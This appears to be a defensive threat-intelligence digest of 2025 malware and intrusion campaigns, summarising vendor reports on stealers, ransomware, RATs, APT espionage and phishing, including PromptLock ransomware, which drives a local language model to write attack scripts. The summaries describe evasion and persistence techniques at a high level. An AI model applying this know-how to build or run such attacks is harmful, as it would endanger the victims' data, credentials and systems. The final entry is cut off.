Summary:: Cyfirma researchers have uncovered a new Windows malware called Salat Stealer, developed and operated by Russian-speaking cybercriminals. This malware is designed to steal browser passwords, cryptocurrency wallet data, and session tokens on a large scale. It leverages JavaScript and a packed loader to deploy a malicious DLL that communicates with its operators over encrypted HTTPS and WebSocket channels. Once inside a system, it establishes persistence by modifying registry settings and scheduling tasks, while also disabling Windows Defender and recovery options to make removal harder. The stolen data is encrypted and sent to servers controlled by the attackers. Access to this stolen information is sold through a web panel called “NyashTeam,” part of a growing MaaS. If undetected, Salat Stealer can lead to stolen credentials, account takeovers, cryptocurrency theft, business email compromise, and deeper intrusions inside corporate networks.

Source: https://www.cyfirma.com/research/unmasked-salat-stealer-a-deep-dive-into-its-advanced-persistence-mechanisms-and-c2-infrastructure/

Intel Source:: Reversing Labs

Intel Name:: Malicious_npm_Packages_Blockchain_Based_Loader

Date of Scan:: 2025-09-07

Impact:: MEDIUM

Summary:: Researchers at ReversingLabs have observed a software-supply-chain campaign that weaponises two JavaScript utility packages to surreptitiously install downloader malware via Ethereum smart-contracts . The actor embeds an obfuscated Node.js script that queries a public contract to retrieve a command-and-control (C2) URL, then executes system commands to pull a second-stage payload . By hosting C2 data on the blockchain—traffic that blends with legitimate crypto activity—the threat significantly impedes traditional URL or domain-based detections . GitHub repositories masquerading as popular cryptocurrency trading bots amplify distribution through fabricated stars, forks and automated commit inflation, luring developers into adding the tainted dependencies.

Source: https://www.reversinglabs.com/blog/ethereum-contracts-malicious-code

Intel Source:: Wiz

Intel Name:: Attackers_Abuse_AWS_SES_for_Phishing_Campaign

Date of Scan:: 2025-09-07

Impact:: MEDIUM

Summary:: Wiz researchers have uncovered a phishing campaign where attackers exploit stolen AWS access keys to compromise the victim’s Simple Email Service (SES) environment. The attack begins when a previously inactive IAM key is suddenly activated from an unusual network, indicating credential compromised. The attackers then quickly bypass SES’s default sandbox restrictions by upgrading the account to production mode, enabling them to send up to 50,000 emails per day. They proceed to register new domains, create generic email addresses, and distribute phishing emails disguised as 2024 tax documents that redirect recipients to credential-stealing websites. The operation runs entirely within AWS in which attackers blend malicious activity with legitimate cloud traffic for making detection difficult. The result is large-scale credential theft, potential business email compromise, and service disruptions for the affected victim.

Source: https://www.wiz.io/blog/wiz-discovers-cloud-email-abuse-campaign

Intel Source:: ESET

Intel Name:: Kimsuky_Dropbox_Enabled_PowerShell_Espionage

Date of Scan:: 2025-09-06

Impact:: MEDIUM

Summary:: Researchers at ESET have identified a PowerShell malware sample attributed to the North Korean threat actor Kimsuky, deployed in July 2025 against a South Korean non-profit organization engaged in diplomatic and foreign affairs. The script, Diplomatic Plaza.ps1, collects host data including running processes, OS version, public IP address, and antivirus product details, then exfiltrates this information to Dropbox using stolen tokens. It further downloads secondary payloads from both Dropbox and attacker-controlled infrastructure, achieving persistence through scheduled tasks and hidden cmd.exe execution. The campaign reflects espionage intent, with Dropbox API abuse providing stealth against traditional detection methods and chained persistence enabling long-term access.

Source: https://wezard4u.tistory.com/429586

Intel Source:: Silent Push

Intel Name:: IPTV_Piracy_Large_Scale_Hosting_Network

Date of Scan:: 2025-09-06

Impact:: MEDIUM

Summary:: Researchers at Silent Push have identified a massive IPTV piracy network leveraging more than 1,100 domains and 10,000 IP addresses. The infrastructure has been operating for years and serves pirated content from over 20 major brands, including sports broadcasters and streaming services. Two commercial entities, XuiOne and Tiyansoft, were linked to profiting from the distribution of this unlicensed content. The investigation further tied at least one individual, Nabi Neamati of Herat, Afghanistan, to operational control of the network, including web hosting and software setup. Multiple domains such as xuione.com, jvtvlive.xyz, streamxpert.net, and tiyansoft.com were clustered under common dedicated IPs, showing a coordinated backend infrastructure.

Source: https://www.silentpush.com/blog/iptv-piracy/?utm_source=rss&utm_medium=rss&utm_campaign=iptv-piracy

Intel Source:: Proofpoint

Intel Name:: Stealerium_and_Phantom_Infostealer_Surge

Date of Scan:: 2025-09-06

Impact:: HIGH

Summary:: Researchers at Proofpoint have observed a resurgence in campaigns leveraging Stealerium, an open-source infostealer first released on GitHub in 2022, and its derivatives including Phantom Stealer and Warp Stealer. Activity spiked between May and July 2025, with campaigns linked to threat actors TA2715 and TA2536, marking the first large-scale use of Stealerium since early 2023. Delivery relied on phishing emails impersonating trusted entities such as banks, charities, travel agencies, and courts, distributing payloads via compressed executables, JavaScript, VBScript, ISO, IMG, and ACE archives, with themes including payment requests, legal summons, bookings, and adult content. Once executed, Stealerium collects Wi-Fi credentials using netsh wlan, modifies Windows Defender exclusions, and persists via scheduled tasks while stealing data ranging from browser cookies, credit card data, and VPN credentials to crypto wallets, emails, and chat sessions.

Source: https://www.proofpoint.com/us/blog/threat-insight/not-safe-work-tracking-and-investigating-stealerium-and-phantom-infostealers

Intel Source:: Trellix

Intel Name:: XWorm_Backdoor_Campaign

Date of Scan:: 2025-09-05

Impact:: MEDIUM

Summary:: Researchers at Trellix have uncovered an advanced variant of XWorm, a .NET-based RAT distributed through weaponized .lnk shortcut files which initiate a multi-stage infection chain that ultimately installs a packed backdoor on Windows systems. The malware leverages embedded PowerShell script to download a disguised loader which then installs additional payloads to gain higher privileges and establish persistence. Once installed, XWorm disables Windows Firewall, creates scheduled tasks, and modifies registry keys to ensure it survives system reboots. It also employs techniques like heavy packing, virtual machine checks, and string obfuscation to evade detection. The decrypted C2 logic reveals a wide range of backdoor capabilities, including downloading and exfiltrating files, redirecting URLs, shutting down systems, and launching DDoS attacks.

Source: https://www.trellix.com/blogs/research/xworms-evolving-infection-chain-from-predictable-to-deceptive/

Intel Source:: Huntress

Intel Name:: Obscura_Ransomware

Date of Scan:: 2025-09-05

Impact:: HIGH

Summary:: Researchers at Huntress have discovered a new ransomware variant called Obscura, designed to distribute significantly within Windows networks. It was first observed executing on domain controllers, enabling it to move swiftly across an organization’s Active Directory. The ransomware copies itself through the SYSVOL share and creates scheduled tasks to launch encryption on multiple machines at the same time. Prior to encrypting files, it verifies for admin rights, terminates security and backup processes, and deletes shadow copies to prevent recovery. It employs strong encryption (XChaCha20 with Curve25519) and leaves a ransom note demanding payment within 24 hours. The malware has different modes of operation for standalone PCs, domain members, and domain controllers. However, once deployed, it causes massive data loss and downtime since every system it reaches gets encrypted.

Source: https://www.huntress.com/blog/obscura-ransomware-variant

Intel Source:: Seqrite

Intel Name:: Google_Salesforce_Breach

Date of Scan:: 2025-09-04

Impact:: HIGH

Summary:: Researchers from Seqrite have identified that two groups known as UNC6040 and UNC6240, linked to the ShinyHunters collective known as “The Com”, breached Google’s Salesforce system. The attackers leveraged voice phishing to trick Google support staff into approving a malicious OAuth 2.0 application which granted them immediate access to high-privilege API tokens without needing passwords. They then use custom Python scripts that mimic Salesforce DataLoader to exfiltrate large amounts of customer data belonging to Google’s small- and medium-sized business clients. The stolen information included names, phone numbers, and email addresses but not Google account passwords. The attackers routed the stolen data through Mullvad VPN servers and TOR exit nodes and subsequently issued a Bitcoin extortion demand. Although Google successfully contained the breach, the stolen data still poses significant risks such as phishing, credential theft, and compliance issues for affected customers.

Source: https://www.seqrite.com/blog/google-salesforce-breach-unc6040-threat-research/

Intel Source:: CERT-AGID

Intel Name:: MintsLoader_Resumed_PEC_Phishing_Campaign

Date of Scan:: 2025-09-04

Impact:: MEDIUM

Summary:: Researchers at CERT-AGID have observed a resurgence of the MintsLoader malware campaign following a summer pause, marking the first wave since June 2025. The campaign continues exploiting certified email (PEC) channels by sending malicious messages from compromised PEC accounts to other PEC recipients, leveraging the trust of this channel to increase delivery success. In this iteration, attackers shifted from hyperlink-based lures to ZIP attachments containing obfuscated JavaScript loaders that initiate the compromise chain. Once executed on Windows 10 and later systems, the loader abuses the built-in cURL utility to download and install infostealer malware, enabling credential theft and sensitive data exfiltration.

Source: https://cert-agid.gov.it/news/riprende-la-campagna-mintsloader/

Intel Source:: ASEC

Intel Name:: DireWolf_Ransomware_Targets_Multiple_Organisations

Date of Scan:: 2025-09-03

Impact:: HIGH

Summary:: ASEC researchers have uncovered a ransomware group called DireWolf that first emerged in May 2025 with the launch of its darknet leak site. The group is financially motivated and operates a double-extortion model that combines file encryption with the threat of publishing stolen data to pressure victims into paying ransoms. The ransomware is designed to target Windows systems and employs parallelized worker pool to accelerate encryption with Curve25519 and the ChaCha20 cipher. It deletes Windows event logs, removes shadow copies, disables the Windows Recovery Environment, and terminates backup, database, and security processes such as Veeam, MSSQL, and Exchange. Victim organisations disclosed so far include manufacturing, IT, construction, and finance sectors across Asia-Pacific, North America, and Europe, indicating opportunistic targeting rather than focus on a specific sector. The attackers communicate with victims via a Tox messenger ID, enabling anonymous ransom negotiations.

Source: https://asec.ahnlab.com/ko/89938/

Intel Source:: FOX IT

Intel Name:: Lazarus_Targets_DeFi_with_Layered_RAT_Campaign

Date of Scan:: 2025-09-03

Impact:: HIGH

Summary:: Researchers at Fox-IT have observed a financially motivated Lazarus subgroup conducting a sophisticated attack against a decentralized finance (DeFi) organization using layered remote-access tooling. The threat actor initiated contact via Telegram, impersonating legitimate trading-firm employees to lure a victim into a browser session that likely exploited a zero-day vulnerability for code execution. Persistence was established through phantom DLL loading and privilege escalation to SYSTEM, allowing the hijacking of built-in Windows services and kernel-level tampering to suppress endpoint telemetry. The group deployed three distinct RATs in sequence: PondRAT for initial file and process control, ThemeForestRAT for in-memory post-exploitation, and RemotePE for long-term access. Additional tools enabled capabilities such as screenshot capture, keylogging, credential dumping, and tunneling, supporting broad data collection and lateral movement. The campaign focused on harvesting sensitive financial data and maintaining persistent access to high-value systems while employing custom encryption and rootkit techniques for stealth. Cross-platform malware variants targeting Windows, Linux, and macOS further demonstrated the actor’s technical versatility.

Source: https://blog.fox-it.com/2025/09/01/three-lazarus-rats-coming-for-your-cheese/

Intel Source:: Cyfirma

Intel Name:: Inf0s3c_Stealer_Python_Based_Info_Grabber

Date of Scan:: 2025-09-03

Impact:: MEDIUM

Summary:: Researchers at CYFIRMA have identified Inf0s3c Stealer, a UPX-compressed, PyInstaller-packed Python executable designed to harvest host information and exfiltrate it via Discord. The stealer enumerates system details, running processes, and user-directory trees, then captures screenshots and optional webcam images. It siphons browser credentials, Discord and Telegram tokens, cryptocurrency wallets, Wi-Fi keys, and gaming-platform cookies . Collected artefacts are staged in a temporary workspace, compressed into a password-protected RAR archive, and automatically transmitted to an attacker-controlled channel . Persistence is achieved by copying itself to the Startup folder and attempting a UAC bypass, while anti-VM checks and code packing hinder analysis.

Source: https://www.cyfirma.com/research/unveiling-a-python-stealer-inf0s3c-stealer/

Intel Source:: Nextron Systems

Intel Name:: APT36_Sindoor_Dropper_Linux_Dot_desktop_Phishing_Campaign

Date of Scan:: 2025-09-03

Impact:: MEDIUM

Summary:: Researchers at Nextron Systems have observed a spear-phishing campaign dubbed “Sindoor Dropper” that targets desktop Linux users. The operation is attributed with moderate confidence to APT36 (Transparent Tribe). Attackers deliver weaponised .desktop files masquerading as PDFs that execute without privilege escalation, granting initial access. A multistage loader chain restores stripped ELF headers, decrypts payloads with DES-CBC and Base64 layers, and employs anti-analysis checks for virtual machines, strings, and system uptime. The final stage drops a legitimate MeshAgent binary that establishes a WebSocket C2 channel to attacker infrastructure on AWS, providing full interactive control, file transfer, and screen capture. This access enables data exfiltration and manual lateral movement across victim networks.

Source: https://www.nextron-systems.com/2025/08/29/sindoor-dropper-new-phishing-campaign/

Intel Source:: Any.Run

Intel Name:: Lumma_Stealer_Credential_Theft_Malware_Targets_Windows

Date of Scan:: 2025-09-03

Impact:: MEDIUM

Summary:: Researchers at ANY.RUN have observed Lumma Stealer, a commodity Windows infostealer that siphons browser credentials, cookies, and host inventory data from compromised endpoints. The malware is delivered mainly through phishing emails that drop a loader; once launched, the chain proceeds with privilege-escalation attempts and durable persistence mechanisms . ANY.RUN’s interactive sandbox recorded staged payload downloads and C2 beacons, mapping the full attack sequence in under 30 seconds . Lumma’s operators appear financially motivated, seeking to monetize stolen credentials via direct fraud or resale on criminal markets.

Source: https://any.run/cybersecurity-blog/streamline-your-soc/

Intel Source:: Polyswarm

Intel Name:: VShell_Filename_triggered_Linux_Memory_Resident_Backdoor

Date of Scan:: 2025-09-02

Impact:: MEDIUM

Summary:: Researchers at PolySwarm have observed VShell, a custom Go backdoor delivered through a novel filename-based command-injection chain that targets Linux hosts. The attack begins with a spam email containing a RAR archive whose crafted filename embeds a Base64-encoded Bash script that executes automatically when common shell utilities process the listing. This first-stage code downloads an architecture-specific ELF loader that launches the final payload wholly in memory via fexecve(). Once resident, VShell masquerades as a kernel thread and communicates with hard-coded C2 servers using XOR-encrypted traffic. The implant offers interactive reverse shell, file transfer, process control and TCP/UDP tunneling, providing full post-exploitation capability.

Source: https://blog.polyswarm.io/vshell-linux-backdoor

Intel Source:: writeups.ryingo

Intel Name:: AI_Waifu_RAT_LLM_enabled_backdoor_for_remote_code_execution

Date of Scan:: 2025-09-02

Impact:: MEDIUM

Summary:: Researchers at writeups.ryingo have observed AI Waifu RAT compromising hobbyist Windows users by masquerading as a “Win11 Waifu” enhancement. The malware’s author markets arbitrary code execution as a desirable feature, persuading victims to disable security controls and run unsigned binaries. Static and dynamic analysis shows the agent opens a fixed localhost HTTP service that executes attacker-supplied PowerShell commands, reads arbitrary files, and returns results to an LLM-mediated channel. Traffic is cleartext and unauthenticated, enabling silent attacker control and payload updates. A companion “CTF challenge” binary requests administrator rights and achieves persistence via Run-key registry writes, underscoring deliberate malicious intent. Observed capabilities include remote code execution, data theft, and delivery of secondary payloads, elevating risk despite limited sophistication.

Source: https://ryingo.gitbook.io/writeups-ai_waifu_rat

Intel Source:: AWS Blog

Intel Name:: APT29_Watering_Hole_Campaign

Date of Scan:: 2025-09-01

Impact:: MEDIUM

Summary:: Amazon researchers have observed that the Russia-linked threat group APT29, also known as Midnight Blizzard, compromised multiple legitimate websites by injecting malicious JavaScript designed to secretly redirect visitors to attacker-controlled domains impersonating Cloudflare verification pages. The objective was to deceive users into approving Microsoft device code authentication requests, allowing the attackers to steal access tokens for Microsoft 365 and other cloud resources. The campaign leveraged randomized redirects, base64-encoded scripts, and cookies to evade detection and avoid repeated exposure. According to researcher, no AWS customer data was compromised, but if successful, the attack could have enabled large-scale cloud and email intrusions, credential theft, and intelligence collection.

Source: https://aws.amazon.com/blogs/security/amazon-disrupts-watering-hole-campaign-by-russias-apt29/

Intel Source:: Huntress

Intel Name:: MetaStealer_Fake_AnyDesk_Installer_Leads_to_Infostealer

Date of Scan:: 2025-09-01

Impact:: MEDIUM

Summary:: Researchers at Huntress have observed a social-engineering campaign that impersonates the AnyDesk remote-access tool to deliver the MetaStealer infostealer. The lure starts with a bogus Cloudflare Turnstile CAPTCHA that pressures users to “verify” themselves, then abuses the search-ms URI handler to open Windows File Explorer to an attacker-controlled SMB share. A Windows LNK file, disguised as Readme Anydesk.pdf, downloads a legitimate AnyDesk installer to reduce suspicion while silently fetching and running an MSI package that drops MetaStealer. The stealer harvests credentials, crypto-wallet data and arbitrary files, exfiltrating them to command-and-control infrastructure.

Source: https://www.huntress.com/blog/fake-anydesk-clickfix-metastealer-malware

Intel Source:: Proofpoint

Intel Name:: Multiple_Threat_Actors_AI_Website_Builder_Fuels_Phishing

Date of Scan:: 2025-09-01

Impact:: MEDIUM

Summary:: Proofpoint researchers have observed a surge of credential-phishing, malware and fraud campaigns that abuse the free “Lovable” AI website-generation platform. Threat actors use Lovable to spin up convincing brand-impersonation sites (e.g., Microsoft, UPS, Aave) that harvest passwords, MFA tokens, credit-card details and even cryptocurrency wallets. The same infrastructure also delivers payloads such as zgRAT via sideloading techniques. Campaign telemetry shows tens of thousands of malicious Lovable URLs each month, reaching more than 5,000 organizations across typical corporate email, SMS and web channels.

Source: https://www.proofpoint.com/us/blog/threat-insight/cybercriminals-abuse-ai-website-creation-app-phishing

Intel Source:: Mosyle

Intel Name:: JSCoreRunner_Browser_hijacking_malware_via_fake_PDF_tool

Date of Scan:: 2025-08-31

Impact:: MEDIUM

Summary:: Researchers at Mosyle have identified JSCoreRunner, a previously unknown macOS threat that masquerades as a free PDF-conversion utility before executing an unsigned second-stage installer that bypasses Gatekeeper. The two-stage chain rewrites Google Chrome profile settings to funnel searches through a fraudulent engine, suppressing crash logs to remain covert . This grants the operator persistent visibility into victims’ web activity and positions them to harvest credentials or redirect users to phishing pages. The first installer is signed with a now-revoked certificate, while the second is completely unsigned, highlighting deliberate evasion of Apple notarization checks . At discovery, the sample had zero detections on VirusTotal, underscoring its novelty and the limitations of signature-based defenses . Victimology is currently limited to macOS users who seek third-party file converters, but any unmanaged endpoint could be at risk.

Source: https://9to5mac.com/2025/08/27/mosyle-identifies-new-mac-malware-that-evades-detection-through-fake-pdf-conversion-tool/

Intel Source:: ASEC

Intel Name:: Interlock_AES_256_GCM_Ransomware_Targeting_Businesses

Date of Scan:: 2025-08-31

Impact:: HIGH

Summary:: Researchers at AhnLab Security Emergency response Center (ASEC) have identified “Interlock,” a ransomware operation that surfaced in September 2024 and is now conducting continuous double-extortion attacks against companies and critical infrastructure operators across North America and Europe. The group’s malware leverages OpenSSL to combine AES-256-GCM file encryption with RSA-4096 key wrapping, leaving victims unable to decrypt data locally once the symmetric key and IV are sealed in each file trailer. At run-time, the payload decrypts itself in memory, patches code on the fly, and deletes traces to evade signature-based and memory scanners. Command-line switches enable full-drive encryption, single-file targeting, forced process termination, and Task Scheduler abuse for privilege escalation, underscoring operational flexibility.

Source: https://asec.ahnlab.com/en/89912/

Intel Source:: Cyfirma

Intel Name:: TinkyWinkey_Keylogger_Stealth_Windows_credential_capture

Date of Scan:: 2025-08-31

Impact:: MEDIUM

Summary:: Researchers at CYFIRMA have observed the emergence of TinkyWinkey, a Windows-focused keylogger that achieves persistence by installing its loader as a system service and then injecting its payload into explorer.exe. The malware sets a low-level keyboard hook to record every keystroke and tags entries with active window titles and keyboard-layout changes, maximising credential-harvesting accuracy. On launch, it profiles the host (CPU, RAM, OS build, local IP) to aid follow-on operations. Logged data are written to an obfuscated file in the user’s temporary directory and staged locally for exfiltration. Because TinkyWinkey operates without outbound command-and-control traffic, network monitoring alone is unlikely to reveal its presence. No built-in propagation or lateral-movement mechanisms were documented, indicating operators rely on other access vectors to deploy the tool.

Source: https://www.cyfirma.com/research/tinkywinkey-keylogger/

Intel Source:: Permiso

Intel Name:: EncryptHub_Teams_Phishing_Delivers_PowerShell_Loader

Date of Scan:: 2025-08-31

Impact:: HIGH

Summary:: Researchers at Permiso have identified a financially motivated threat group dubbed EncryptHub (a.k.a. LARVA-208/Water Gamayun) abusing Microsoft Teams direct messages for initial access. The actors establish or hijack Microsoft 365 tenants and pose as “IT Support” to trick employees into accepting external chats. Social-engineering lures prompt victims to launch built-in remote-assist utilities such as QuickAssist or to install AnyDesk, granting attackers real-time keyboard access. With control of the workstation, they deploy a multi-stage PowerShell loader that bypasses execution policy, harvests credentials and system data, and opens an AES-encrypted command channel. The loader marks its own process as critical, causing a blue screen if defenders terminate it, and persists via scheduled tasks or registry Run keys. Follow-on payloads observed include DarkGate and Matanbuchus, malware families frequently linked to ransomware operators. Victims include IT administrators, developers and Web3 personnel in English-speaking organisations, indicating a focus on users with elevated access.

Source: https://permiso.io/blog/sliding-into-your-dms-abusing-microsoft-teams-for-malware-delivery?hs_preview=VYVYybGX-195188659586

Intel Source:: ASEC

Intel Name:: NightSpire_Aggressive_Double_Extortion_Ransomware

Date of Scan:: 2025-08-31

Impact:: MEDIUM

Summary:: Researchers at ASEC have observed NightSpire, a ransomware group active since February 2025, executing aggressive double-extortion campaigns. The actor runs a Dedicated Leak Site with countdown timers to pressure payment and uses highly threatening language in its ransom notes. NightSpire offers multiple negotiation channels—including ProtonMail, OnionMail and Telegram—signalling a service-oriented, mature infrastructure. Initial access is reportedly gained by exploiting corporate vulnerabilities, but no automated worm-like propagation has been documented. Victims already span retail, chemical manufacturing, maritime, accounting, construction, technology, business services and financial sectors across the US, Japan, Thailand, the UK, China, Poland, Hong Kong, Taiwan and South Korea.

Source: https://asec.ahnlab.com/en/89913/

Intel Source:: Seqrite

Intel Name:: APT37_Operation_HanKook_Phantom_Spear_Phishing_Campaign

Date of Scan:: 2025-08-31

Impact:: HIGH

Summary:: Researchers at Seqrite Lab have identified a North Korean APT37 (ScarCruft/InkySquid) spear-phishing operation dubbed Operation HanKook Phantom. The campaign delivers Korean-language PDF decoys bundled with malicious LNK shortcuts that launch multi-stage, fileless PowerShell loaders to implant the custom ROKRAT backdoor . ROKRAT enumerates hosts, captures keystrokes and screens, exfiltrates local files and downloads follow-on payloads via encrypted traffic routed through legitimate cloud APIs (Dropbox, pCloud, Yandex Disk) . Decoy content referencing Kim Yo-Jong statements and South-Korean policy documents indicates strategic intelligence collection on inter-Korean affairs . Victimology spans government ministries, universities and research institutes focused on security, energy and labour issues .

Source: https://www.seqrite.com/blog/operation-hankook-phantom-north-korean-apt37-targeting-south-korea/

Intel Source:: ESET Research

Intel Name:: PromptLock_AI_driven_ransomware_PoC_with_Lua_scripts

Date of Scan:: 2025-08-30

Impact:: MEDIUM

Summary:: Researchers at ESET have identified PromptLock, which they describe as the first known AI-powered ransomware. The malware’s identity is a Golang-written ransomware capable of file encryption and data exfiltration, with Windows and Linux variants seen uploaded to VirusTotal. Its core capability is on-host generation and execution of Lua scripts, produced on the fly by a locally run large language model accessed via the Ollama API, enabling automated reconnaissance and file selection prior to encryption. The report notes prompts are hard-coded to drive the model’s script generation, suggesting operator intent to modularize behavior and rapidly adapt tasks.

Source: https://www.welivesecurity.com/en/ransomware/first-known-ai-powered-ransomware-uncovered-eset-research/

Intel Source:: Qi’anxin Threat Intelligence Center

Intel Name:: Lazarus_Group_Using_Clickfix_to_Deliver_Malware

Date of Scan:: 2025-08-30

Impact:: MEDIUM

Summary:: Qi’anxin researchers have uncovered a new phishing campaign by the North Korean Lazarus group, known internally as APT-Q-1. This group has been active since 2007 and targeting government agencies, financial institutions, cryptocurrency exchanges, and individuals across specific industries. In this campaign, Lazarus leverages a ClickFix tactic, where victims are lured with fake job postings and redirecting them to attacker-controlled interview websites. During the process, victims are informed their camera setup is faulty and are prompted to download Nvidia software update but is in fact a malicious package. This package deploys the BeaverTail info-stealer through a Node.js environment, and on Windows 11 systems, also installs a backdoor named drvUpdate.exe enabling attackers to execute commands and read/write files. Additionally, the installs the InvisibleFerret Python Trojan to establish persistence and facilitate data theft, using registry entries to maintain long-term access.

Source: https://www.ctfiot.com/267223.html

Intel Source:: Qi’anxin Threat Intelligence Center

Intel Name:: UTG_0_I1000_Delivers_Silver_Fox_Trojan

Date of Scan:: 2025-08-30

Impact:: MEDIUM

Summary:: Researchers from Qi’anxin have identified a phishing campaign orchestrated by the UTG-0-I1000 Finance Group targeting corporate finance employees. The attackers send emails disguised as tax audits, subsidy notices, and other finance-related communications to trick recipients into opening malicious files. These files deliver the Silver Fox remote-control Trojan, enabling persistent access to the compromised system. Compromised machines are then used to spread QR-code phishing links that steal bank card details, login credentials and SMS codes, facilitating fraudulent fund transfers. The attackers use legitimate code-signing certificates, XOR-encrypted loaders, segmented infrastructure, and techniques that tamper with commercial monitoring tools to evade detection.

Source: https://mp.weixin.qq.com/s?__biz=MzI2MDc2MDA4OA==&mid=2247515766&idx=1&sn=30a7d04ff2b61bfda9ac6d7c6c1070a5&poc_token=HD9ysGijQQJbgZkBL5Pp059HzXOQqtQtXuMuQVVN

Intel Source:: ASEC

Intel Name:: Underground_Ransomware_Targeted_Data_Theft_and_Encryption

Date of Scan:: 2025-08-29

Impact:: MEDIUM

Summary:: Researchers at AhnLab ASEC have observed Underground, a double-extortion ransomware crew that first surfaced in July 2023 and re-emerged in May 2024 with a branded leak site. The operation is currently striking organisations in the United Arab Emirates, United States, France, Spain, Australia, Germany, Slovakia, Taiwan, Singapore, Canada and South Korea across construction, interior design, manufacturing and IT sectors. The attackers gain interactive access, perform environment reconnaissance and compile a bespoke 64-bit Windows payload tailored for a single chosen host. When executed, the malware deletes Volume Shadow Copies, stops Microsoft SQL services and modifies Remote Desktop Protocol settings before encrypting recently accessed user files. Each file is locked with a unique AES key that is itself sealed with a hard-coded RSA public key, rendering host-based recovery infeasible.

Source: https://asec.ahnlab.com/en/89835/

Intel Source:: CISA

Intel Name:: PRC_APT_Router_Level_Global_Espionage_Campaign

Date of Scan:: 2025-08-29

Impact:: HIGH

Summary:: Researchers at CISA have observed a cluster of People’s Republic of China (PRC) state-sponsored actors mapped by industry to Salt Typhoon, OPERATOR PANDA and UNC5807 exploiting network-edge devices worldwide since at least 2021. The actors exploit publicly known CVEs in Cisco IOS XE, Ivanti, Palo Alto PAN-OS and other platforms to gain root access. Their objective is long-term espionage, harvesting credentials and full-packet traffic from telecommunications, government, transportation, lodging and military networks. After initial access they establish covert GRE/IPsec tunnels, deploy custom Golang SFTP implants and abuse SNMP and TACACS+ to stage and exfiltrate data.

Source: https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-239a

Intel Source:: sophos

Intel Name:: Velociraptor_Tool_Abuse_Remote_Access_and_Ransomware_Prep

Date of Scan:: 2025-08-29

Impact:: MEDIUM

Summary:: Researchers at Sophos have identified an intrusion in which an unidentified threat actor covertly installed the open-source Velociraptor incident-response framework on a Windows host to fetch and launch Visual Studio Code with the “tunnel” option enabled, thereby establishing interactive command-and-control. The attacker leveraged the native msiexec utility and an encoded PowerShell launcher to stage payloads from a Cloudflare Workers sub-domain, reducing detection by relying on legitimate software. Velociraptor was configured to beacon to a second Workers endpoint for persistence and tasking. Follow-on downloads of additional MSI packages indicate preparation for broader malware deployment. Investigators assess that the intrusion chain was a precursor to ransomware execution, halted only after an XDR alert prompted rapid host isolation. Abuse of a well-known DFIR tool for malicious access represents an evolution from earlier misuse of remote-management software, complicating defender trust models.

Source: https://news.sophos.com/en-us/2025/08/26/velociraptor-incident-response-tool-abused-for-remote-access/

Intel Source:: Any.Run

Intel Name:: Tycoon2FA_and_ClickFix_Phishing_Campaigns

Date of Scan:: 2025-08-29

Impact:: MEDIUM

Summary:: ANY.RUN Researchers have identified several campaigns in the month of August 2025 that weaponize multi-stage phishing kits and social-engineering flows to defeat two-factor authentication. The First dubbed as Tycoon2FA leverages a seven-step chain involving CAPTCHAs, press-and-hold gestures and email validation screens before presenting a spoofed Microsoft 365 portal to harvest credentials and one-time passwords. In parallel, a ClickFix flow leverages msiexec to silently install Rhadamanthys Stealer, which then downloads a PNG-embedded payload while evading detection through anti-VM checks and mismatched TLS certificates. The campaigns are targeting government, banking, insurance, telecom, manufacturing, healthcare, education, and logistics entities institutions across the US, UK, Canada, and Europe.

Source: https://any.run/cybersecurity-blog/cyber-attacks-august-2025/

Intel Source:: PolySwarm

Intel Name:: GodRAT_Malware

Date of Scan:: 2025-08-28

Impact:: MEDIUM

Summary:: Researchers at PolySwarm have identified a new malware strain dubbed GodRAT, built on the old Gh0st RAT codebase and primarily targets financial institutions, including trading and brokerage firms. The malware is distributed through malicious files disguised as financial documents and shared via Skype. GodRAT employs advanced evasion techniques, such as steganography to conceal shellcode within image files and the use of expired but legitimate digital certificates. Once executed, it injects malicious code into legitimate processes and retrieves configuration data from its C2 server. The RAT is capable of collecting extensive system information, harvesting browser credentials, downloading and executing additional payloads, and manipulating the file system. Additionally, they also deploy AsyncRAT alongside dedicated password stealers to maintain persistence. Recent campaigns leveraging GodRAT have been observed across multiple regions, including Hong Kong, the United Arab Emirates, Lebanon, Malaysia, and Jordan.

Source: https://blog.polyswarm.io/godrat

Intel Source:: Huntress

Intel Name:: Cephalus_Ransomware

Date of Scan:: 2025-08-28

Impact:: MEDIUM

Summary:: Huntress researchers have observed two incidents involving the Cephalus ransomware group, where attackers gained access to systems by compromising RDP accounts. After gaining access, they executed a legitimate SentinelOne binary to secretly load a malicious DLL containing the ransomware, effectively bypassing security controls. Before encrypting files, the attackers disabled Windows Defender’s real-time protection and deleted shadow backups to hinder recovery efforts. They also leveraged MEGA cloud storage to exfiltrate stolen data, indicating the use of a double-extortion model—stealing and encrypting data to pressure victims into paying. The campaign appears opportunistic in nature rather than targeting a specific industry sector.

Source: https://www.huntress.com/blog/cephalus-ransomware

Intel Source:: Fortinet

Intel Name:: UpCrypter_Loader_Phishing_Campaign

Date of Scan:: 2025-08-28

Impact:: MEDIUM

Summary:: FortiGuard researchers have identified a global phishing campaign that leverages the UpCrypter loader framework to deliver multiple RATs, including PureVNC, DCrat, and Babylon RAT. The attackers send tailored phishing emails that redirect victims to fake voicemail or purchase-order websites, hosting obfuscated JavaScript droppers. Once executed, these scripts download a compressed payload containing a .NET MSIL loader, which runs directly in memory and uses PowerShell to retrieve the final RAT. The UpCrypter framework adds registry run keys for persistence, performs anti-virtual machine and anti-debug checks to avoid analysis, and even hides C2 data inside JPEG images to evade detection. A successful compromise gives attackers full remote access to the victim’s system, enabling credential theft and establishing long-term control over Windows machines.

Source: https://www.fortinet.com/blog/threat-research/phishing-campaign-targeting-companies-via-upcrypter

Intel Source:: Securelist

Intel Name:: PipeMagic_Backdoor_Evolution

Date of Scan:: 2025-08-27

Impact:: MEDIUM

Summary:: Researchers at Securelist have identified a resurgence of the PipeMagic backdoor, showing clear evolution in both delivery and post-exploitation tactics since its first appearance in 2022. The campaign leverages a mix of loaders, including a trojanized ChatGPT desktop application, a C# Help Index file executed through msbuild, and DLL hijacking, all of which establish the same Windows-based backdoor tied to Azure-hosted infrastructure. Once deployed, the malware establishes encrypted local communications via named pipes, extends functionality through modular plugins, and uses a .NET injector to disable AMSI, ensuring persistence and evasion.

Source: https://securelist.com/pipemagic/117270/

Intel Source:: Any.Run

Intel Name:: Salty2FA_PhaaS_Framework

Date of Scan:: 2025-08-27

Impact:: MEDIUM

